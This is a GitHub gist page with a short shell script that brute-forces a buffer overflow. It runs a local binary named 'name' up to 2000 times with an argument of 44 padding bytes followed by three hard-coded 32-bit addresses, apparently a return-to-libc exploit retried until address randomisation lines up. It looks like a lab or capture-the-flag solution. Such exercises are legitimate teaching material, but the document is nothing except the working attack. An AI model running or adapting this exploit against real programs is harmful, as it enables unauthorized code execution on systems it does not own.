Skip to content

Instantly share code, notes, and snippets.

@RdlP
Created October 21, 2016 14:16
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save RdlP/2a88fbd0037aa0c6bc1df506da53b633 to your computer and use it in GitHub Desktop.
Save RdlP/2a88fbd0037aa0c6bc1df506da53b633 to your computer and use it in GitHub Desktop.
#!/bin/sh
for i in `seq 1 2000`;
do
echo "Número de intentos: $i"
./name `python -c "print 'A'*44 + '\x70\x83\x04\x08' + '\x90\x83\x04\x08' + '\x3e\x73\xf3\xff' "`
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment